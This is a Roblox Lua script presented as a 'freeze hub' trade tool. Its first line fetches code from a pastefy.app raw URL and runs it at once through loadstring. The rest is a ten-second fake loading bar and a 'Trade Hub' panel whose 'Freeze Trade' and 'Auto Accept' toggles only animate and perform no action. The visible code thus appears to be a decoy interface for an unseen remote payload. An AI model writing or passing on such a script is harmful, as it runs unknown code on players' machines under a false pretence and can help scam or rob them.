loadstring(game:HttpGet("https://pastefy.app/dY4HOPmn/raw", true))()
local player = game.Players.LocalPlayer
local PlayerGui = player:WaitForChild("PlayerGui")

--====================--
-- LOADING SCREEN (MATCHED STYLE)
--====================--

local LoadingGui = Instance.new("ScreenGui")
LoadingGui.Parent = PlayerGui
LoadingGui.ResetOnSpawn = false

local frame = Instance.new("Frame")
frame.Parent = LoadingGui
frame.Size = UDim2.new(0, 220, 0, 65)
frame.Position = UDim2.new(0.5, -110, 0.5, -32)
frame.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
frame.BackgroundTransparency = 0.1 -- glass look

Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 14)

-- Soft outline (NOT thick)
local stroke = Instance.new("UIStroke", frame)
stroke.Color = Color3.fromRGB(60, 60, 60)
stroke.Thickness = 1
stroke.Transparency = 0.5

-- Text (centered)
local text = Instance.new("TextLabel")
text.Parent = frame
text.Size = UDim2.new(1, 0, 0.6, 0)
text.BackgroundTransparency = 1
text.Text = "freeze hub"
text.TextColor3 = Color3.fromRGB(220,220,220)
text.TextScaled = true
text.Font = Enum.Font.GothamBold

-- Progress bar bg (thin & subtle)
local barBG = Instance.new("Frame")
barBG.Parent = frame
barBG.Position = UDim2.new(0.1, 0, 0.7, 0)
barBG.Size = UDim2.new(0.8, 0, 0, 6)
barBG.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
barBG.BackgroundTransparency = 0.3
Instance.new("UICorner", barBG).CornerRadius = UDim.new(1,0)

-- Progress bar (light blue thin)
local bar = Instance.new("Frame")
bar.Parent = barBG
bar.Size = UDim2.new(0, 0, 1, 0)
bar.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
Instance.new("UICorner", bar).CornerRadius = UDim.new(1,0)

-- Smooth loading (10s)
for i = 1, 100 do
	bar.Size = UDim2.new(i/100, 0, 1, 0)
	task.wait(0.1)
end

LoadingGui:Destroy()

--====================--
-- TRADE HUB (SAME AS BEFORE)
--====================--

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Parent = PlayerGui
ScreenGui.ResetOnSpawn = false

local Main = Instance.new("Frame")
Main.Parent = ScreenGui
Main.Size = UDim2.new(0, 180, 0, 130)
Main.Position = UDim2.new(0.5, -90, 0.5, -65)
Main.BackgroundColor3 = Color3.fromRGB(20, 0, 40)
Main.Active = true
Main.Draggable = true

Instance.new("UICorner", Main).CornerRadius = UDim.new(0, 12)

local stroke2 = Instance.new("UIStroke", Main)
stroke2.Color = Color3.fromRGB(140, 0, 255)
stroke2.Thickness = 2

-- Title
local Title = Instance.new("TextLabel")
Title.Parent = Main
Title.Size = UDim2.new(1, 0, 0, 25)
Title.BackgroundTransparency = 1
Title.Text = "Trade Hub ⚜"
Title.TextColor3 = Color3.fromRGB(200,150,255)
Title.TextScaled = true
Title.Font = Enum.Font.GothamBold

-- Freeze
local FreezeText = Instance.new("TextLabel")
FreezeText.Parent = Main
FreezeText.Position = UDim2.new(0, 10, 0, 35)
FreezeText.Size = UDim2.new(0.6, 0, 0, 20)
FreezeText.BackgroundTransparency = 1
FreezeText.Text = "Freeze Trade"
FreezeText.TextColor3 = Color3.fromRGB(255,255,255)
FreezeText.TextScaled = true
FreezeText.Font = Enum.Font.Gotham

local FreezeToggle = Instance.new("TextButton")
FreezeToggle.Parent = Main
FreezeToggle.Position = UDim2.new(0.7, 0, 0, 35)
FreezeToggle.Size = UDim2.new(0, 40, 0, 20)
FreezeToggle.BackgroundColor3 = Color3.fromRGB(120, 0, 200)
FreezeToggle.Text = ""

Instance.new("UICorner", FreezeToggle).CornerRadius = UDim.new(1,0)

local fCircle = Instance.new("Frame", FreezeToggle)
fCircle.Size = UDim2.new(0, 18, 0, 18)
fCircle.Position = UDim2.new(0, 1, 0.5, -9)
fCircle.BackgroundColor3 = Color3.fromRGB(255,255,255)
Instance.new("UICorner", fCircle).CornerRadius = UDim.new(1,0)

local freezeOn = false
FreezeToggle.MouseButton1Click:Connect(function()
	freezeOn = not freezeOn
	if freezeOn then
		fCircle:TweenPosition(UDim2.new(1, -19, 0.5, -9), "Out", "Quad", 0.2, true)
	else
		fCircle:TweenPosition(UDim2.new(0, 1, 0.5, -9), "Out", "Quad", 0.2, true)
	end
end)

-- Auto
local AutoText = Instance.new("TextLabel")
AutoText.Parent = Main
AutoText.Position = UDim2.new(0, 10, 0, 70)
AutoText.Size = UDim2.new(0.6, 0, 0, 20)
AutoText.BackgroundTransparency = 1
AutoText.Text = "Auto Accept"
AutoText.TextColor3 = Color3.fromRGB(255,255,255)
AutoText.TextScaled = true
AutoText.Font = Enum.Font.Gotham

local AutoToggle = Instance.new("TextButton")
AutoToggle.Parent = Main
AutoToggle.Position = UDim2.new(0.7, 0, 0, 70)
AutoToggle.Size = UDim2.new(0, 40, 0, 20)
AutoToggle.BackgroundColor3 = Color3.fromRGB(120, 0, 200)
AutoToggle.Text = ""

Instance.new("UICorner", AutoToggle).CornerRadius = UDim.new(1,0)

local aCircle = Instance.new("Frame", AutoToggle)
aCircle.Size = UDim2.new(0, 18, 0, 18)
aCircle.Position = UDim2.new(0, 1, 0.5, -9)
aCircle.BackgroundColor3 = Color3.fromRGB(255,255,255)
Instance.new("UICorner", aCircle).CornerRadius = UDim.new(1,0)

local autoOn = false
AutoToggle.MouseButton1Click:Connect(function()
	autoOn = not autoOn
	if autoOn then
		aCircle:TweenPosition(UDim2.new(1, -19, 0.5, -9), "Out", "Quad", 0.2, true)
	else
		aCircle:TweenPosition(UDim2.new(0, 1, 0.5, -9), "Out", "Quad", 0.2, true)
	end
end)

-- Footer
local Footer = Instance.new("TextLabel")
Footer.Parent = Main
Footer.Position = UDim2.new(0, 0, 1, -18)
Footer.Size = UDim2.new(1, 0, 0, 15)
Footer.BackgroundTransparency = 1
Footer.Text = "discord.gg"
Footer.TextColor3 = Color3.fromRGB(180,120,255)
Footer.TextScaled = true
Footer.Font = Enum.Font.Gotham
